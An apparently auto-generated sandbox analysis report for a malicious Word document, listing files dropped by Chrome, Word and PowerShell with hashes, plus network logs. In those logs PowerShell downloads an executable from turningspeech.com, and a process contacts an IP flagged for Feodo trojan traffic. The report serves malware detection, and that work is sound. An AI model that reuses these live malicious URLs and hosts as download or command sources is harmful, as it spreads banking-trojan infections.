MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: 7bc4a6376d0f5de130255d1c13b4c7e6
SHA256: 846a4fddbfcdde9976a650d81d3df13db0c14a43ab571651eb7e841869a4c878
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF1aca66.TMP
text
MD5: 7bc4a6376d0f5de130255d1c13b4c7e6
SHA256: 846a4fddbfcdde9976a650d81d3df13db0c14a43ab571651eb7e841869a4c878
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\b4497aad-9eef-4cc6-b8f3-5a37b4c30eb0.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\in_progress_download_metadata_store~RF1ac66e.TMP
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\in_progress_download_metadata_store
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\897322a2-03dd-4ce9-b577-100a79b10a8e.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\Downloads\PAY30075874683860.doc:Zone.Identifier
text
MD5: fbccf14d504b7b2dbcb5a5bda75bd93b
SHA256: eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
3684
chrome.exe
C:\Users\admin\Downloads\PAY30075874683860.doc
document
MD5: f3f0c3ab525f0e91098b4cbe6908f31a
SHA256: 3eb82a4222e85a3bf961d094c19520e14f28142b9b58cc0ad165aaa219c788b8
3684
chrome.exe
C:\Users\admin\Downloads\PAY30075874683860.doc.crdownload
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF1ac361.TMP
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\Downloads\77629c38-9c67-42cd-9db7-8f06b85c91d7.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\in_progress_download_metadata_store
binary
MD5: 0b45142c8a1ddfaefccda9b7cb2610bf
SHA256: a760d6c76b5a032b5b03c5e82a7a094706ff71272117377d4f4b6546e0d52c9f
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\in_progress_download_metadata_store~RF1ac1ca.TMP
binary
MD5: 0b45142c8a1ddfaefccda9b7cb2610bf
SHA256: a760d6c76b5a032b5b03c5e82a7a094706ff71272117377d4f4b6546e0d52c9f
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\2c02c8f3-b1fd-4d46-bf97-a3c8f4ed6f90.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\000003.log
binary
MD5: 991641dbcc63a7eacba784846f16492f
SHA256: d402a1e89776f26565012ebd063638b57e09e58efc77105415906eebafc0fdd0
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\LOG
text
MD5: 956f89fb3e78a15cc87268bc44dfcb35
SHA256: df343db8940e4dca51d3d9e1c3acb13dc7737983a02d2d0ba524be52ca937c4a
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt
binary
MD5: 12511d80e357372ed3274d3950ae61c4
SHA256: d85e54fcce65cebb017cf5a5564a4f39568b8ecc43943443fe92d271d0a09216
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF1abdb4.TMP
binary
MD5: 12511d80e357372ed3274d3950ae61c4
SHA256: d85e54fcce65cebb017cf5a5564a4f39568b8ecc43943443fe92d271d0a09216
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\65f25b9a843df642_1
binary
MD5: 9a51196d9620c26f364ac2046e2f90df
SHA256: 52c701ff1800b23731c3f4701a68bf2e73648f5a9ef90ae853f433d914235d60
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\65f25b9a843df642_0
binary
MD5: 0dffbf2618499f179f7cd6eff8dc5fe1
SHA256: ddab2f1c2c7b9e96edaf8f55be81a3406d49f21a03fb0fb3f117df5af44d858e
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\4db55b0a5eaa7ca5_0
binary
MD5: 26e282b7234ea81b0aacf744c97a885f
SHA256: d23d2c825027e505773b470a4a834ed90f369ca1a17ccf4cc0bd301329857eff
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014
flc
MD5: 149f959f30e847388c190d86414c919d
SHA256: 88d3a21008ad313f63e4f4f12d15c9803ce1eba0a8c536cf9ae9239e7f6aa112
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013
compressed
MD5: c56ae712affba11eaf7d2c39157578f0
SHA256: d0a3d50c65fc89bcac840567856ec2c8bc424b0b2ecf9314b369f1d38b9ae507
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt
binary
MD5: fea9c87a69dd90e945d1b739533dd97e
SHA256: 5b9c8e5f016952357934f13a3a5dd4aed20eb1ddd3fc3c2c1282d06bfc3475a3
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\index-dir\the-real-index
binary
MD5: 0275ec146a7bd7761ef7dec437ee635d
SHA256: 7d3ffa50f2aeecdc3a9ca31d9a576af69b64e9826dd2ed4fd0f3bb1c582a614c
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF1abc7b.TMP
binary
MD5: fea9c87a69dd90e945d1b739533dd97e
SHA256: 5b9c8e5f016952357934f13a3a5dd4aed20eb1ddd3fc3c2c1282d06bfc3475a3
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\index
text
MD5: 4f67aba5cb5b04976834ad6da18d2017
SHA256: 4476d281b3d119577eb8f19fd90e042e5a456cba30d0bb16d05654acc91aec5b
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_1
binary
MD5: fb120bb5d9cd57affe8e0e36a7fb688d
SHA256: d681aaa539959dfd3a7acab40f7b3b0b48c953f41f772783427314b892c32c28
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_0
binary
MD5: a5fc183481de8a776510a941ba506ee7
SHA256: ac6d0162535bea711631c240f75760d867686dc5416bbb99a1f0673575c07516
3332
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR862E.tmp.cvr
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\1c12f9ab6da65929_0
binary
MD5: 55a7048a29d7e460a94c8162cc684756
SHA256: 2b735c7131e27f1cfab6ba2f1a9434698787aa366700c7eb1a2334d4e5d481e7
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011
compressed
MD5: d91402f1172c7bb347493404f100b3ee
SHA256: aaee8b8e6cfb061cee46314c1a1b05b760f0a3aada88f4a8883aef8310de16e2
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010
compressed
MD5: add5bb80416c26f7c28719e958358b3f
SHA256: a306c0648ad5677440b32ea320034994f934eb02df8bdd75c27f6bf785fefc20
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Last Session
binary
MD5: 02536c23edc1e418a6fea313d20b2a39
SHA256: 8e8de8689482b477d0beebe0a4ac24b9cabcbfa84848f66b4c0f55cd96dc0fe9
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old~RF1aadc5.TMP
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f
compressed
MD5: 668970b23bd23ff62682d4c55d77b324
SHA256: 4b9b6bf5416bf2256aaeb9cd17021516eaf9b00aa99692dacd31b0858212a258
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e
image
MD5: 0515236318ac3251ff39eb8372a0c129
SHA256: 228cb9c602929e1a2fb17408fe812af3599ab9f734d0b7c499ab79e15c5b8dd4
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d
binary
MD5: 7b2f52b15e37963071743a00305705c9
SHA256: bf5d79e5d2aea39305b612db8b0ad81c31e3507ef31f31843ca3b50fc5a578df
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\40bba07c05914591_0
binary
MD5: 64f961df9d4543f3903f5b6cbee61a53
SHA256: ab1d9c60d5f9427eacfc0baaee83484cc2e38d47d768cadce47b19407cdedbc4
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\LOG.old
text
MD5: 65e3a899ee20811d157b572ffa34a607
SHA256: fdbc070214092df54b10dc06b2a40f0cc30ad00d410ba67de9f98a3d53f08a75
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old
text
MD5: 7282c871a31b4aae7e61cdbb39a13331
SHA256: af615c556e2a22e87135a967c01e869216f65268a88bd218fd6ab70467bdf733
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old~RF1aaa89.TMP
text
MD5: 7282c871a31b4aae7e61cdbb39a13331
SHA256: af615c556e2a22e87135a967c01e869216f65268a88bd218fd6ab70467bdf733
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\65f25b9a843df642_0
binary
MD5: 8f19f04c8863e889cb6a9b5f298e35b3
SHA256: a4faadad01cae3333729f75fc9fb86ddecf9e0f37c07b74662d6588222226c8b
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c
compressed
MD5: 737096a391cc2cfbe167a01ba07c9ba2
SHA256: d7741f6d6c163689294530c2f3c9635ce5d26e18b715d14ec2dbe7fcd781db31
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old~RF1aaa1c.TMP
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\50da1ec5d44a313d_0
binary
MD5: 7128eed5c2a87e0d6e58cf98b179e8ee
SHA256: b71f3c219ad472ab5bfb873a5a3c9456d49a10a8907d262a58bd28260530c432
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\3a41e250d088c297_0
binary
MD5: a8d0c077b170d801a3c8c70250476cc0
SHA256: 80bf74b9db4fccdce32bfcbc74d3a1be10d189f4a549689d04004b07c7c2b926
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF1aa99f.TMP
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF1aa941.TMP
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
binary
MD5: 97c046337392e02f2464f4828c90e293
SHA256: f980db74f1f80a9adb07ab265ccc32c76f3f69e480934307ccf556b55220f2e1
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model
binary
MD5: 5415d8c25f27b34e247965e091a33a5c
SHA256: 771da5b354fb2dbac41ecf9c60c0438a5b46fd890a1c99ca6063dfae869ccada
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model~RF1aa8e3.TMP
binary
MD5: 5415d8c25f27b34e247965e091a33a5c
SHA256: 771da5b354fb2dbac41ecf9c60c0438a5b46fd890a1c99ca6063dfae869ccada
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\617d9a58-5b58-4f51-aab8-13d1b7c0f53b.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old~RF1aa54a.TMP
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF1aa51b.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT~RF1aa50b.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF1aa4fb.TMP
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF1aa4cd.TMP
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\8a58682a-6a8a-4e64-b5c4-b263c2fe4057.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF1aa4bd.TMP
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old~RF1aa49e.TMP
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Version
text
MD5: c10ebd4db49249efc8d112b2920d5f73
SHA256: 90a1b994cafe902f22a88a22c0b6cc9cb5b974bf20f8964406dd7d6c9b8867d1
2452
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
binary
MD5: b59113c2dcd2d346f31a64f231162ada
SHA256: 1d97c69aea85d3b06787458ea47576b192ce5c5db9940e5eaa514ff977ce2dc2
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
binary
MD5: 9c016064a1f864c8140915d77cf3389a
SHA256: 0e7265d4a8c16223538edd8cd620b8820611c74538e420a88e333be7f62ac787
1488
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][1].txt
text
MD5: c7c082b33cfcc34eb0893c2aaafaab4a
SHA256: f5873fd827939b5c0ada41d7fe87a0061ac82b04427089c0b7eefd47848e096b
3404
iexplore.exe
C:\Users\admin\AppData\Local\Temp\StructuredQuery.log
text
MD5: 9a6c20b4a92ebf503b579e10dcc5d18a
SHA256: 163212c479f786cf306e721ef54c978b3683ce827d84f309efd15941e96e3754
3404
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[3].png
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
3404
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
3404
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 829d5e1e35c279922cb412e8d26cb54a
SHA256: 5007f83ed70998687f5dba4f4090e6ad60432ab2c3187a47c7cf683bd5e5cda6
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\83a25a3b-d0d7-4f9d-89ef-368005a23787.tmp
––
MD5:  ––
SHA256:  ––
3412
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
3412
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19932e.TMP
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
3412
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8IB79KD1ILXNRXV3ZG0D.temp
––
MD5:  ––
SHA256:  ––
3332
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$s4-l1c5x-ypgzxqk.doc
pgc
MD5: df5bf5fed10279dc3c2ddefb832b9326
SHA256: 9f398b62e094c62096a9b569c71668a98008e883c1820037e3d73a20e0be34d1
3332
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: bca7725c8cb9c8d63ec166e879124b21
SHA256: 05e75a6d04cefc391deaf88aff57a37ecfc5f3af4f711dc7518eb32a07640d73
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF1b4090.TMP
text
MD5: 829d5e1e35c279922cb412e8d26cb54a
SHA256: 5007f83ed70998687f5dba4f4090e6ad60432ab2c3187a47c7cf683bd5e5cda6

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
3
TCP/UDP connections
23
DNS requests
16
Threats
5

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3412 powershell.exe GET 200 178.128.41.189:80 http://turningspeech.com/rm44r5z/usg/ GR
executable
suspicious
3404 iexplore.exe GET 200 204.79.197.200:80 http://www.bing.com/favicon.ico US
image
whitelisted
2260 wabmetagen.exe GET 200 187.233.152.78:443 http://187.233.152.78:443/ MX
binary
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3412 powershell.exe 178.128.41.189:80 Forthnet GR suspicious
3404 iexplore.exe 204.79.197.200:80 Microsoft Corporation US whitelisted
2260 wabmetagen.exe 187.233.152.78:443 Uninet S.A. de C.V. MX malicious
1488 iexplore.exe 112.213.89.123:443 SUPERDATA VN suspicious
3684 chrome.exe 172.217.16.163:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.22.35:443 Google Inc. US whitelisted
3684 chrome.exe 216.58.210.3:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.23.138:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.16.141:443 Google Inc. US unknown
3684 chrome.exe 172.217.22.99:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.22.14:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.21.238:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.22.4:443 Google Inc. US whitelisted
3684 chrome.exe 172.217.23.131:443 Google Inc. US whitelisted
3684 chrome.exe 112.213.89.123:443 SUPERDATA VN suspicious
3684 chrome.exe 216.58.206.10:443 Google Inc. US whitelisted
3684 chrome.exe 216.58.208.35:443 Google Inc. US whitelisted

DNS requests

Domain IP Reputation
turningspeech.com 178.128.41.189
suspicious
www.bing.com 204.79.197.200
13.107.21.200
whitelisted
utit.vn 112.213.89.123
suspicious
www.gstatic.com 216.58.210.3
whitelisted
clientservices.googleapis.com 172.217.22.35
whitelisted
www.google.de 172.217.16.163
whitelisted
safebrowsing.googleapis.com 172.217.23.138
whitelisted
accounts.google.com 172.217.16.141
shared
ssl.gstatic.com 172.217.22.99
whitelisted
apis.google.com 172.217.22.14
whitelisted
ogs.google.com 172.217.21.238
whitelisted
www.google.com 172.217.22.4
whitelisted
www.google.no 172.217.23.131
whitelisted
fonts.googleapis.com 216.58.206.10
whitelisted
fonts.gstatic.com 216.58.208.35
whitelisted

Threats

PID Process Class Message
3412 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3412 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3412 powershell.exe Misc activity ET INFO EXE - Served Attached HTTP
2260 wabmetagen.exe A Network Trojan was detected MALWARE [PTsecurity] Feodo HTTP request

1 ETPRO signatures available at the full report

Debug output strings

No debug info.